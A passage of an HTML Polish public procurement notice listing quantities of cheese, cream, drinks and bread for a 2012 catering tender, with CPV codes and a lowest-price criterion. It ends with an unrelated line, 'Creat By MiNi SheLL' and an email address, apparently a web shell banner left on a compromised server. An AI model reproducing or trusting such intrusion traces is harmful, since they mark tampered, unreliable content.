ser żółty  morski	kg	5
ser żółty  szwajcar	kg	17
śmietana w spray 0,5	szt	7
Śmietana 18% 0,5 l	szt	12
Śmietana 30%  0,5 l	szt	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5l	szt.	50
napoje niegazowane 1,5 l	szt	50
napój gazowany 2l	szt	17
napój n/g 2 l	szt	17
Woda mineral. 0,5 gaz	szt	100
Woda mineralna 0,5 n/g	szt	100
Woda mineralna n/g 0,5 l 	szt	100
woda mineral. G 0,,5 l 	szt	100
woda mineral. n/g 1,5 l	szt	350
Woda mineralna g 1,5 l 	szt	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony0,6kg	szt	1300
chleb forma 0.5	szt	50
chleb forma 1kg	szt	17
chleb słonecznikowy 0,5 	szt	17
chleb sojowy 0.5	szt	17
chleb razowy 0,5	szt	20
chleb wiejski 1kg	szt	5
ciastka drożdżowe 100g	szt	133
ciasta różne	kg	8
bułki 100g	szt	133
bułki 50g	szt	1733
bułki hamburger	szt	60
rogal 100g	szt	120
bułka tarta	kg	13
bułka tarta 0,5kg	szt	7
pączki 100g	szt	90
ciastka francuskie	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com